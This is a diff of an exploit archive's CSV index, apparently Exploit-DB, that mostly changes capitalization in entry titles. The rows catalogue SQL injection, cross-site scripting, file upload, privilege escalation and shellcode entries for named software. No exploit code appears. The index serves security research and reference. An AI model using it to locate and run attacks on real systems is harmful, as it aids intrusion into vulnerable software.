37969,platforms/hardware/remote/37969.txt,"FirePass 7.0 SSL VPN - 'refreshURL' Parameter URI Redirection",2012-10-21,"Aung Khant",hardware,remote,0 -37970,platforms/php/webapps/37970.html,"WordPress Wordfence Security Plugin - Cross-Site Scripting",2012-10-18,MustLive,php,webapps,0 +37970,platforms/php/webapps/37970.html,"Wordpress Wordfence Security Plugin - Cross-Site Scripting",2012-10-18,MustLive,php,webapps,0 37971,platforms/php/webapps/37971.html,"WHMCS 4.5.2 - 'googlecheckout.php' SQL Injection",2012-10-22,"Starware Security Team",php,webapps,0 37973,platforms/php/webapps/37973.txt,"SMF - 'view' Parameter Cross-Site Scripting",2012-10-23,Am!r,php,webapps,0 37974,platforms/php/webapps/37974.txt,"Inventory - Multiple Cross-Site Scripting / SQL Injection",2012-10-26,G13,php,webapps,0 @@ -34293,7 +34293,7 @@ id,file,description,date,author,platform,type,port 37979,platforms/php/webapps/37979.txt,"VicBlog - Multiple SQL Injections",2012-10-26,Geek,php,webapps,0 37980,platforms/windows/dos/37980.pl,"Microsoft Excel - Denial of Service",2012-10-11,"Jean Pascal Pereira",windows,dos,0 37981,platforms/windows/dos/37981.pl,"Microsoft Paint 5.1 - '.bmp' Denial of Service",2012-10-27,coolkaveh,windows,dos,0 -37982,platforms/hardware/remote/37982.pl,"TP-LINK TL-WR841N Router - Local File Inclusion",2012-10-29,"Matan Azugi",hardware,remote,0 +37982,platforms/hardware/remote/37982.pl,"TP-Link TL-WR841N Router - Local File Inclusion",2012-10-29,"Matan Azugi",hardware,remote,0 37983,platforms/php/webapps/37983.php,"EasyITSP - 'customers_edit.php' Authentication Security Bypass",2012-10-26,"Michal Blaszczak",php,webapps,0 37984,platforms/windows/dos/37984.pl,"KMPlayer 3.0.0.1440 - '.avi' File Local Denial of Service",2012-10-26,Am!r,windows,dos,0 37985,platforms/windows/remote/37985.py,"FHFS - FTP/HTTP File Server 2.1.2 Remote Command Execution",2015-08-27,"Naser Farhadi",windows,remote,80 @@ -34309,7 +34309,7 @@ id,file,description,date,author,platform,type,port 37995,platforms/asp/webapps/37995.txt,"SolarWinds Orion IP Address Manager - (IPAM) 'search.aspx' Cross-Site Scripting",2012-10-31,"Anthony Trummer",asp,webapps,0 37996,platforms/windows/remote/37996.txt,"Axigen Mail Server - 'fileName' Parameter Directory Traversal",2012-10-31,"Zhao Liang",windows,remote,0 37997,platforms/ios/dos/37997.txt,"Photo Transfer (2) 1.0 iOS - Denial of Service",2015-08-28,Vulnerability-Lab,ios,dos,3030 -37998,platforms/php/webapps/37998.txt,"WordPress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80 +37998,platforms/php/webapps/37998.txt,"Wordpress Responsive Thumbnail Slider Plugin 1.0 - Arbitrary File Upload",2015-08-28,"Arash Khazaei",php,webapps,80 37999,platforms/java/webapps/37999.txt,"Jenkins 1.626 - Cross-Site Request Forgery / Code Execution",2015-08-28,smash,java,webapps,0 38000,platforms/php/webapps/38000.txt,"Wolf CMS - Arbitrary File Upload To Command Execution",2015-08-28,"Narendra Bhati",php,webapps,80 38002,platforms/php/webapps/38002.txt,"Pluck CMS 4.7.3 - Multiple Vulnerabilities",2015-08-28,smash,php,webapps,80 @@ -34322,18 +34322,18 @@ id,file,description,date,author,platform,type,port 38009,platforms/php/webapps/38009.txt,"AWAuctionScript CMS - Multiple Remote Vulnerabilities",2012-11-04,X-Cisadane,php,webapps,0 38010,platforms/php/webapps/38010.txt,"VeriCentre - Multiple SQL Injections",2012-11-06,"Cory Eubanks",php,webapps,0 38011,platforms/php/webapps/38011.txt,"OrangeHRM - 'sortField' Parameter SQL Injection",2012-11-07,"High-Tech Bridge",php,webapps,0 -38012,platforms/php/webapps/38012.txt,"WordPress FLV Player Plugin - 'id' Parameter SQL Injection",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0 +38012,platforms/php/webapps/38012.txt,"Wordpress FLV Player Plugin - 'id' Parameter SQL Injection",2012-11-07,"Ashiyane Digital Security Team",php,webapps,0 38013,platforms/windows/remote/38013.py,"PCMan FTP Server 2.0.7 - RENAME Command Buffer Overflow",2015-08-29,Koby,windows,remote,21 38014,platforms/windows/dos/38014.py,"Sysax Multi Server 6.40 - SSH Component Denial of Service",2015-08-29,3unnym00n,windows,dos,22 38015,platforms/php/webapps/38015.txt,"AR Web Content Manager - (AWCM) cookie_gen.php Arbitrary Cookie Generation",2012-11-08,"Sooel Son",php,webapps,0 38016,platforms/multiple/webapps/38016.txt,"ESRI ArcGIS for Server - 'where' Form Field SQL Injection",2012-11-09,anonymous,multiple,webapps,0 -38017,platforms/php/webapps/38017.txt,"WordPress Kakao Theme - 'ID' Parameter SQL Injection",2012-11-09,sil3nt,php,webapps,0 -38018,platforms/php/webapps/38018.txt,"WordPress PHP Event Calendar Plugin - 'cid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 -38019,platforms/php/webapps/38019.txt,"WordPress Eco-annu Plugin - 'eid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 +38017,platforms/php/webapps/38017.txt,"Wordpress Kakao Theme - 'ID' Parameter SQL Injection",2012-11-09,sil3nt,php,webapps,0 +38018,platforms/php/webapps/38018.txt,"Wordpress PHP Event Calendar Plugin - 'cid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 +38019,platforms/php/webapps/38019.txt,"Wordpress Eco-annu Plugin - 'eid' Parameter SQL Injection",2012-11-09,"Ashiyane Digital Security Team",php,webapps,0 38020,platforms/hardware/remote/38020.py,"Multiple Huawei Products - Password Encryption",2012-11-13,"Roberto Paleari",hardware,remote,0 38021,platforms/multiple/dos/38021.pl,"Media Player Classic 1.5 - (MPC) WebServer Request Handling Remote Denial of Service",2012-11-16,X-Cisadane,multiple,dos,0 -38022,platforms/php/webapps/38022.txt,"WordPress Dailyedition-mouss Theme - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 -38023,platforms/php/webapps/38023.txt,"WordPress Tagged Albums Plugin - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 +38022,platforms/php/webapps/38022.txt,"Wordpress Dailyedition-mouss Theme - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 +38023,platforms/php/webapps/38023.txt,"Wordpress Tagged Albums Plugin - 'id' Parameter SQL Injection",2012-11-16,"Ashiyane Digital Security Team",php,webapps,0 38024,platforms/php/webapps/38024.txt,"WebKit Cross-Site Scripting Filter - 'Cross-Site ScriptingAuditor.cpp' Security Bypass",2012-07-19,"Tushar Dalvi",php,webapps,0 38025,platforms/php/webapps/38025.txt,"Omni-Secure - 'dir' Parameter Multiple File Disclosure Vulnerabilities",2012-11-19,HaCkeR_EgY,php,webapps,0 38026,platforms/php/webapps/38026.txt,"Friends in War The FAQ Manager - 'question' Parameter SQL Injection",2012-11-16,unsuprise,php,webapps,0 @@ -34345,35 +34345,35 @@ id,file,description,date,author,platform,type,port 38032,platforms/ios/dos/38032.pl,"Viber 4.2.0 - Non-Printable Characters Handling Denial of Service",2015-08-31,"Mohammad Reza Espargham",ios,dos,0 38034,platforms/hardware/webapps/38034.txt,"Cyberoam Firewall CR500iNG-XP - 10.6.2 MR-1 - Blind SQL Injection",2015-08-31,"Dharmendra Kumar Singh",hardware,webapps,0 38035,platforms/windows/local/38035.pl,"Boxoft WAV to MP3 Converter - convert Feature Buffer Overflow",2015-08-31,"Robbie Corley",windows,local,0 -38036,platforms/osx/local/38036.rb,"Apple OS X Entitlements - 'Rootpipe' Privilege Escalation",2015-08-31,Metasploit,osx,local,0 +38036,platforms/osx/local/38036.rb,"Apple OSX Entitlements - 'Rootpipe' Privilege Escalation",2015-08-31,Metasploit,osx,local,0 38037,platforms/php/webapps/38037.html,"Open-Realty 2.5.8 - Cross-Site Request Forgery",2012-11-16,"Aung Khant",php,webapps,0 38038,platforms/multiple/dos/38038.txt,"Splunk 4.3.1 - Denial of Service",2012-11-19,"Alexander Klink",multiple,dos,0 38039,platforms/php/webapps/38039.txt,"openSIS - 'modname' Parameter Local File Inclusion",2012-11-20,"Julian Horoszkiewicz",php,webapps,0 38040,platforms/php/webapps/38040.txt,"ATutor - 'tool_file' Parameter Local File Inclusion",2012-11-16,"Julian Horoszkiewicz",php,webapps,0 -38041,platforms/php/webapps/38041.txt,"WordPress Madebymilk Theme - 'id' Parameter SQL Injection",2012-11-20,"Ashiyane Digital Security Team",php,webapps,0 +38041,platforms/php/webapps/38041.txt,"Wordpress Madebymilk Theme - 'id' Parameter SQL Injection",2012-11-20,"Ashiyane Digital Security Team",php,webapps,0 38042,platforms/php/webapps/38042.txt,"dotProject 2.1.x - 'index.php' Multiple Parameter SQL Injection",2012-11-21,"High-Tech Bridge",php,webapps,0 38043,platforms/php/webapps/38043.txt,"dotProject 2.1.x - 'index.php' Multiple Parameter Cross-Site Scripting",2012-11-21,"High-Tech Bridge",php,webapps,0 38044,platforms/php/webapps/38044.txt,"Feng Office - Security Bypass / HTML Injection Vulnerabilities",2012-11-21,Ur0b0r0x,php,webapps,0 38045,platforms/php/webapps/38045.html,"XiVO - Cross-Site Request Forgery",2012-11-21,"Francis Provencher",php,webapps,0 -38046,platforms/php/webapps/38046.txt,"WordPress Zingiri Web Shop Plugin - 'path' Parameter Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 -38047,platforms/php/webapps/38047.txt,"WordPress Webplayer Plugin - 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 -38048,platforms/php/webapps/38048.txt,"WordPress Plg Novana Plugin - 'id' Parameter SQL Injection",2012-11-22,sil3nt,php,webapps,0 +38046,platforms/php/webapps/38046.txt,"Wordpress Zingiri Web Shop Plugin - 'path' Parameter Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 +38047,platforms/php/webapps/38047.txt,"Wordpress Webplayer Plugin - 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 +38048,platforms/php/webapps/38048.txt,"Wordpress Plg Novana Plugin - 'id' Parameter SQL Injection",2012-11-22,sil3nt,php,webapps,0 38049,platforms/multiple/remote/38049.txt,"Greenstone - Multiple Security Vulnerabilities",2012-11-23,AkaStep,multiple,remote,0 -38050,platforms/php/webapps/38050.txt,"WordPress Zarzadzonie Kontem Plugin - 'ajaxfilemanager.php' Script Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 +38050,platforms/php/webapps/38050.txt,"Wordpress Zarzadzonie Kontem Plugin - 'ajaxfilemanager.php' Script Arbitrary File Upload",2012-11-22,"Ashiyane Digital Security Team",php,webapps,0 38051,platforms/php/webapps/38051.txt,"Bedita 3.5.1 - Cross-Site Scripting",2015-09-01,"Sébastien Morin",php,webapps,80 38052,platforms/windows/dos/38052.py,"Ricoh DC (SR10) 1.1.0.8 - Denial of Service",2015-09-01,j2x6,windows,dos,21 38053,platforms/windows/dos/38053.txt,"Mpxplay Multimedia Commander 2.00a - .m3u Stack-Based Buffer Overflow",2015-09-01,Un_N0n,windows,dos,0 38054,platforms/windows/dos/38054.txt,"SiS Windows VGA Display Manager 6.14.10.3930 - Write-What-Where PoC",2015-09-01,KoreLogic,windows,dos,0 38055,platforms/windows/dos/38055.txt,"XGI Windows VGA Display Manager 6.14.10.1090 - Arbitrary Write PoC",2015-09-01,KoreLogic,windows,dos,0 38056,platforms/hardware/webapps/38056.txt,"Edimax BR6228nS/BR6228nC - Multiple Vulnerabilities",2015-09-01,smash,hardware,webapps,80 -38057,platforms/php/webapps/38057.txt,"WordPress Magazine Basic Theme - 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 +38057,platforms/php/webapps/38057.txt,"Wordpress Magazine Basic Theme - 'id' Parameter SQL Injection",2012-11-22,"Novin hack",php,webapps,0 38058,platforms/ios/remote/38058.py,"Twitter for iPhone - Man in the Middle Security",2012-11-23,"Carlos Reventlov",ios,remote,0 38059,platforms/bsd/dos/38059.c,"OpenBSD 4.x - Portmap Remote Denial of Service",2012-11-22,auto236751,bsd,dos,0 -38060,platforms/php/webapps/38060.txt,"WordPress Ads Box Plugin - 'count' Parameter SQL Injection",2012-11-26,"Ashiyane Digital Security Team",php,webapps,0 +38060,platforms/php/webapps/38060.txt,"Wordpress Ads Box Plugin - 'count' Parameter SQL Injection",2012-11-26,"Ashiyane Digital Security Team",php,webapps,0 38061,platforms/php/webapps/38061.txt,"Beat Websites - 'id' Parameter SQL Injection",2012-11-24,Metropolis,php,webapps,0 38062,platforms/multiple/webapps/38062.txt,"Forescout CounterACT - 'a' Parameter Open Redirection",2012-11-26,"Joseph Sheridan",multiple,webapps,0 -38063,platforms/php/webapps/38063.txt,"WordPress Wp-ImageZoom Theme - 'id' Parameter SQL Injection",2012-11-26,Amirh03in,php,webapps,0 -38064,platforms/php/webapps/38064.txt,"WordPress CStar Design Theme - 'id' Parameter SQL Injection",2012-11-27,Amirh03in,php,webapps,0 +38063,platforms/php/webapps/38063.txt,"Wordpress Wp-ImageZoom Theme - 'id' Parameter SQL Injection",2012-11-26,Amirh03in,php,webapps,0 +38064,platforms/php/webapps/38064.txt,"Wordpress CStar Design Theme - 'id' Parameter SQL Injection",2012-11-27,Amirh03in,php,webapps,0 38065,platforms/osx/shellcode/38065.txt,"OS-X/x86-64 - /bin/sh Null Free Shellcode (34 bytes)",2015-09-02,"Fitzl Csaba",osx,shellcode,0 38068,platforms/php/webapps/38068.txt,"MantisBT 1.2.19 - Host Header Attack",2015-09-02,"Pier-Luc Maltais",php,webapps,80 38071,platforms/php/webapps/38071.rb,"YesWiki 0.2 - 'squelette' Path Traversal",2015-09-02,HaHwul,php,webapps,80 @@ -34381,40 +34381,40 @@ id,file,description,date,author,platform,type,port 38073,platforms/hardware/webapps/38073.html,"GPON Home Router FTP G-93RG1 - Cross-Site Request Forgery Command Execution",2015-09-02,"Phan Thanh Duy",hardware,webapps,80 38074,platforms/php/webapps/38074.txt,"Cerb 7.0.3 - Cross-Site Request Forgery",2015-09-02,"High-Tech Bridge SA",php,webapps,80 38075,platforms/system_z/shellcode/38075.txt,"Mainframe/System Z - Bind Shell Port 12345 Shellcode (2488 bytes)",2015-09-02,"Bigendian Smalls",system_z,shellcode,0 -38086,platforms/php/webapps/38086.html,"WordPress Contact Form Generator 2.0.1 Plugin - Multiple Cross-Site Request Forgery Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80 +38086,platforms/php/webapps/38086.html,"Wordpress Contact Form Generator 2.0.1 Plugin - Multiple Cross-Site Request Forgery Vulnerabilities",2015-09-06,"i0akiN SEC-LABORATORY",php,webapps,80 38076,platforms/php/webapps/38076.txt,"BigDump 0.29b and 0.32b - Multiple Vulnerabilities",2012-11-28,Ur0b0r0x,php,webapps,0 -38077,platforms/php/webapps/38077.txt,"WordPress Toolbox Theme - 'mls' Parameter SQL Injection",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0 +38077,platforms/php/webapps/38077.txt,"Wordpress Toolbox Theme - 'mls' Parameter SQL Injection",2012-11-29,"Ashiyane Digital Security Team",php,webapps,0 38078,platforms/php/webapps/38078.py,"Elastix - 'page' Parameter Cross-Site Scripting",2012-11-29,cheki,php,webapps,0 38099,platforms/php/webapps/38099.txt,"TinyMCPUK - 'test' Parameter Cross-Site Scripting",2012-12-01,eidelweiss,php,webapps,0 38080,platforms/hardware/webapps/38080.txt,"Zhone ADSL2+ 4P Bridge & Router (Broadcom) - Multiple Vulnerabilities",2015-09-04,Vulnerability-Lab,hardware,webapps,0 38081,platforms/hardware/webapps/38081.txt,"HooToo Tripmate HT-TM01 2.000.022 - Cross-Site Request Forgery",2015-09-04,"Ken Smith",hardware,webapps,80 38085,platforms/win_x86-64/dos/38085.pl,"ActiveState Perl.exe x64 Client 5.20.2 - Crash PoC",2015-09-06,"Robbie Corley",win_x86-64,dos,0 38087,platforms/windows/local/38087.pl,"AutoCAD DWG and DXF To PDF Converter 2.2 - Buffer Overflow",2015-09-06,"Robbie Corley",windows,local,0 -38088,platforms/lin_x86/shellcode/38088.c,"Linux/x86 - execve(/bin/bash) shellcode (31 bytes)",2015-09-06,"Ajith Kp",lin_x86,shellcode,0 -38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OS X Client 2.0 - Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0 +38088,platforms/lin_x86/shellcode/38088.c,"Linux/x86 - execve(/bin/bash) Shellcode (31 bytes)",2015-09-06,"Ajith Kp",lin_x86,shellcode,0 +38089,platforms/osx/local/38089.txt,"Disconnect.me Mac OSX Client 2.0 - Privilege Escalation",2015-09-06,"Kristian Erik Hermansen",osx,local,0 38090,platforms/php/webapps/38090.txt,"FireEye Appliance - Unauthorized File Disclosure",2015-09-06,"Kristian Erik Hermansen",php,webapps,443 38091,platforms/php/webapps/38091.php,"Elastix < 2.5 - PHP Code Injection Exploit",2015-09-06,i-Hmx,php,webapps,0 38100,platforms/hardware/remote/38100.txt,"Multiple Fortinet FortiWeb Appliances - Multiple Cross-Site Scripting Vulnerabilities",2012-12-01,"Benjamin Kunz Mejri",hardware,remote,0 -38101,platforms/php/webapps/38101.txt,"WordPress Zingiri Forums Plugin - 'language' Parameter Local File Inclusion",2012-12-30,Amirh03in,php,webapps,0 -38102,platforms/php/webapps/38102.txt,"WordPress Nest Theme - 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0 +38101,platforms/php/webapps/38101.txt,"Wordpress Zingiri Forums Plugin - 'language' Parameter Local File Inclusion",2012-12-30,Amirh03in,php,webapps,0 +38102,platforms/php/webapps/38102.txt,"Wordpress Nest Theme - 'codigo' Parameter SQL Injection",2012-12-04,"Ashiyane Digital Security Team",php,webapps,0 38103,platforms/php/webapps/38103.txt,"Sourcefabric Newscoop - 'f_email' Parameter SQL Injection",2012-12-04,AkaStep,php,webapps,0 38136,platforms/osx/local/38136.txt,"OS X Install.framework - suid root Runner Binary Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 38137,platforms/osx/local/38137.txt,"OS X Install.framework - Arbitrary mkdir / unlink and chown to admin Group",2015-09-10,"Google Security Research",osx,local,0 -38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0 +38094,platforms/lin_x86/shellcode/38094.c,"Linux/x86 - Create file with permission 7775 and exit Shellcode (Generator)",2015-09-07,"Ajith Kp",lin_x86,shellcode,0 38095,platforms/windows/local/38095.pl,"VeryPDF HTML Converter 2.0 - SEH/ToLower() Bypass Buffer Overflow",2015-09-07,"Robbie Corley",windows,local,0 38096,platforms/linux/remote/38096.rb,"Endian Firewall Proxy - Password Change Command Injection",2015-09-07,Metasploit,linux,remote,10443 38097,platforms/hardware/webapps/38097.txt,"NETGEAR Wireless Management System 2.1.4.15 (Build 1236) - Privilege Escalation",2015-09-07,"Elliott Lewis",hardware,webapps,80 38098,platforms/jsp/webapps/38098.txt,"JSPMySQL Administrador - Multiple Vulnerabilities",2015-09-07,hyp3rlinx,jsp,webapps,8081 -38105,platforms/php/webapps/38105.txt,"WordPress White-Label Framework 2.0.6 Theme - Cross-Site Scripting",2015-09-08,Outlasted,php,webapps,80 +38105,platforms/php/webapps/38105.txt,"Wordpress White-Label Framework 2.0.6 Theme - Cross-Site Scripting",2015-09-08,Outlasted,php,webapps,80 38108,platforms/windows/dos/38108.txt,"Advantech WebAccess 8.0 / 3.4.3 ActiveX - Multiple Vulnerabilities",2015-09-08,"Praveen Darshanam",windows,dos,0 38109,platforms/linux/remote/38109.pl,"Oracle MySQL / MariaDB - Insecure Salt Generation Security Bypass",2012-12-06,kingcope,linux,remote,0 38110,platforms/php/webapps/38110.txt,"DirectAdmin Web Control Panel 1.483 - Multiple Vulnerabilities",2015-09-08,"Ashiyane Digital Security Team",php,webapps,0 -38111,platforms/php/webapps/38111.txt,"WordPress Simple Gmail Login Plugin - Stack Trace Information Disclosure",2012-12-07,"Aditya Balapure",php,webapps,0 +38111,platforms/php/webapps/38111.txt,"Wordpress Simple Gmail Login Plugin - Stack Trace Information Disclosure",2012-12-07,"Aditya Balapure",php,webapps,0 38112,platforms/php/webapps/38112.txt,"FOOT Gestion - 'id' Parameter SQL Injection",2012-12-07,"Emmanuel Farcy",php,webapps,0 -38113,platforms/php/webapps/38113.php,"VBulletin ajaxReg Module - SQL Injection",2012-12-08,"Cold Zero",php,webapps,0 +38113,platforms/php/webapps/38113.php,"vBulletin ajaxReg Module - SQL Injection",2012-12-08,"Cold Zero",php,webapps,0 38114,platforms/cgi/webapps/38114.html,"Smartphone Pentest Framework - Multiple Remote Command Execution Vulnerabilities",2012-12-10,"High-Tech Bridge",cgi,webapps,0 38115,platforms/php/webapps/38115.txt,"SimpleInvoices invoices Module - Unspecified Customer Field Cross-Site Scripting",2012-12-10,tommccredie,php,webapps,0 -38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0 +38116,platforms/lin_x86/shellcode/38116.c,"Linux/x86 - execve(_/bin/cat__ [_/bin/cat__ _/etc/passwd_]_ NULL) Shellcode (75 bytes)",2015-09-09,"Ajith Kp",lin_x86,shellcode,0 38118,platforms/xml/webapps/38118.txt,"Qlikview 11.20 SR11 - Blind XXE Injection",2015-09-09,"Alex Haynes",xml,webapps,0 38119,platforms/php/webapps/38119.html,"Auto-Exchanger 5.1.0 - Cross-Site Request Forgery",2015-09-09,"Aryan Bayaninejad",php,webapps,0 38120,platforms/php/dos/38120.txt,"PHP - SplDoublyLinkedList unserialize() Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 @@ -34423,17 +34423,17 @@ id,file,description,date,author,platform,type,port 38123,platforms/php/dos/38123.txt,"PHP Session Deserializer - Use-After-Free",2015-09-09,"Taoguang Chen",php,dos,0 38124,platforms/android/remote/38124.py,"Android Stagefright - Remote Code Execution",2015-09-09,"Joshua J. Drake",android,remote,0 38125,platforms/php/dos/38125.txt,"PHP - unserialize() Use-After-Free Vulnerabilities",2015-09-09,"Taoguang Chen",php,dos,0 -38126,platforms/osx/shellcode/38126.c,"OS-X/x86-64 - 4444/TPC port bind Nullfree shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0 +38126,platforms/osx/shellcode/38126.c,"OS-X/x86-64 - 4444/TPC port bind Nullfree Shellcode (144 bytes)",2015-09-10,"Fitzl Csaba",osx,shellcode,0 38127,platforms/php/webapps/38127.php,"php - cgimode fpm writeprocmemfile bypass disable function demo",2015-09-10,ylbhz,php,webapps,0 38128,platforms/cgi/webapps/38128.txt,"Synology Video Station 1.5-0757 - Multiple Vulnerabilities",2015-09-10,"Han Sahin",cgi,webapps,5000 38129,platforms/php/webapps/38129.txt,"Octogate UTM 3.0.12 - Admin Interface Directory Traversal",2015-09-10,"Oliver Karow",php,webapps,0 38130,platforms/java/webapps/38130.txt,"N-able N-central - Cross-Site Request Forgery",2012-12-13,"Cartel Informatique Security Research Labs",java,webapps,0 38131,platforms/php/webapps/38131.txt,"PHP Address Book - 'group' Parameter Cross-Site Scripting",2012-12-13,"Kenneth F. Belva",php,webapps,0 38132,platforms/linux/dos/38132.py,"Linux Kernel 3.3.5 - Btrfs CRC32C feature Infinite Loop Local Denial of Service",2012-12-13,"Pascal Junod",linux,dos,0 -38133,platforms/php/webapps/38133.txt,"RokBox Plugin for WordPress - /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter Cross-Site Scripting",2012-12-17,MustLive,php,webapps,0 +38133,platforms/php/webapps/38133.txt,"RokBox Plugin for Wordpress - /wp-content/plugins/wp_rokbox/jwplayer/jwplayer.swf abouttext Parameter Cross-Site Scripting",2012-12-17,MustLive,php,webapps,0 38134,platforms/php/webapps/38134.txt,"Joomla! ZT Autolinks Component - 'controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 38135,platforms/php/webapps/38135.txt,"Joomla! Bit Component - 'controller' Parameter Local File Inclusion",2012-12-19,Xr0b0t,php,webapps,0 -38138,platforms/osx/local/38138.txt,"OS X - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 +38138,platforms/osx/local/38138.txt,"OSX - Install.framework suid Helper Privilege Escalation",2015-09-10,"Google Security Research",osx,local,0 38139,platforms/php/webapps/38139.txt,"MyBB Transactions Plugin - 'transaction' Parameter SQL Injection",2012-12-18,limb0,php,webapps,0 38140,platforms/php/webapps/38140.php,"VoipNow Service Provider Edition - Arbitrary Command Execution",2012-12-21,i-Hmx,php,webapps,0 38141,platforms/php/webapps/38141.txt,"Hero Framework - search q Parameter Cross-Site Scripting",2012-12-24,"Stefan Schurtz",php,webapps,0 @@ -34453,22 +34453,22 @@ id,file,description,date,author,platform,type,port 38154,platforms/php/webapps/38154.txt,"cPanel - detailbw.html Multiple Parameter Cross-Site Scripting",2012-12-27,"Christy Philip Mathew",php,webapps,0 38155,platforms/php/webapps/38155.txt,"WHM - 'filtername' Parameter Cross-Site Scripting",2012-12-27,"Rafay Baloch",php,webapps,0 38156,platforms/php/webapps/38156.txt,"cPanel - 'dir' Parameter Cross-Site Scripting",2012-12-26,"Rafay Baloch",php,webapps,0 -38157,platforms/php/webapps/38157.txt,"WordPress Xerte Online Plugin - 'save.php' Arbitrary File Upload",2013-01-02,"Sammy FORGIT",php,webapps,0 -38158,platforms/php/webapps/38158.txt,"WordPress Shopping Cart Plugin for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 -38159,platforms/php/webapps/38159.txt,"WordPress Shopping Cart Plugin for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/backup.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 -38160,platforms/php/webapps/38160.txt,"WordPress Shopping Cart Plugin for WordPress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 +38157,platforms/php/webapps/38157.txt,"Wordpress Xerte Online Plugin - 'save.php' Arbitrary File Upload",2013-01-02,"Sammy FORGIT",php,webapps,0 +38158,platforms/php/webapps/38158.txt,"Wordpress Shopping Cart Plugin for Wordpress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportsubscribers.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 +38159,platforms/php/webapps/38159.txt,"Wordpress Shopping Cart Plugin for Wordpress - /wp-content/plugins/levelfourstorefront/scripts/administration/backup.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 +38160,platforms/php/webapps/38160.txt,"Wordpress Shopping Cart Plugin for Wordpress - /wp-content/plugins/levelfourstorefront/scripts/administration/exportaccounts.php reqID Parameter SQL Injection",2013-01-01,"Sammy FORGIT",php,webapps,0 38161,platforms/php/webapps/38161.txt,"osTicket - l.php url Parameter Arbitrary Site Redirect",2013-01-02,AkaStep,php,webapps,0 38162,platforms/php/webapps/38162.txt,"osTicket - tickets.php status Parameter Cross-Site Scripting",2013-01-02,AkaStep,php,webapps,0 -38163,platforms/php/webapps/38163.txt,"WordPress Uploader Plugin - Arbitrary File Upload",2013-01-03,"Sammy FORGIT",php,webapps,0 +38163,platforms/php/webapps/38163.txt,"Wordpress Uploader Plugin - Arbitrary File Upload",2013-01-03,"Sammy FORGIT",php,webapps,0 38164,platforms/hardware/remote/38164.py,"Belkin Wireless Router Default - WPS PIN Security",2013-01-03,ZhaoChunsheng,hardware,remote,0 -38165,platforms/windows/dos/38165.txt,"IKEView.exe Fox beta 1 - Stack Buffer Overflow",2015-09-13,hyp3rlinx,windows,dos,0 +38165,platforms/windows/dos/38165.txt,"IKEView.exe Fox Beta 1 - Stack Buffer Overflow",2015-09-13,hyp3rlinx,windows,dos,0 38166,platforms/php/webapps/38166.txt,"WHMCS 5.0 - Insecure Cookie Authentication Bypass",2012-12-31,Agd_Scorp,php,webapps,0 -38167,platforms/php/webapps/38167.php,"WordPress Multiple WPScientist Themes - Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0 +38167,platforms/php/webapps/38167.php,"Wordpress Multiple WPScientist Themes - Arbitrary File Upload",2013-01-04,JingoBD,php,webapps,0 38168,platforms/php/webapps/38168.txt,"TomatoCart - 'json.php' Security Bypass",2013-01-04,"Aung Khant",php,webapps,0 38169,platforms/php/webapps/38169.txt,"Havalite CMS - 'comment' Parameter HTML Injection",2013-01-06,"Henri Salo",php,webapps,0 38170,platforms/android/remote/38170.txt,"Facebook for Android - 'LoginActivity' Information Disclosure",2013-01-07,"Takeshi Terada",android,remote,0 38171,platforms/php/webapps/38171.txt,"Joomla! Incapsula Component - Multiple Cross-Site Scripting Vulnerabilities",2013-01-08,"Gjoko Krstic",php,webapps,0 -38178,platforms/php/webapps/38178.txt,"WordPress NextGEN Gallery Plugin - 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0 +38178,platforms/php/webapps/38178.txt,"Wordpress NextGEN Gallery Plugin - 'test-head' Parameter Cross-Site Scripting",2013-01-08,Am!r,php,webapps,0 38173,platforms/multiple/webapps/38173.txt,"ManageEngine EventLog Analyzer < 10.6 build 10060 - SQL Query Execution",2015-09-14,xistence,multiple,webapps,0 38174,platforms/multiple/webapps/38174.txt,"ManageEngine OpManager 11.5 - Multiple 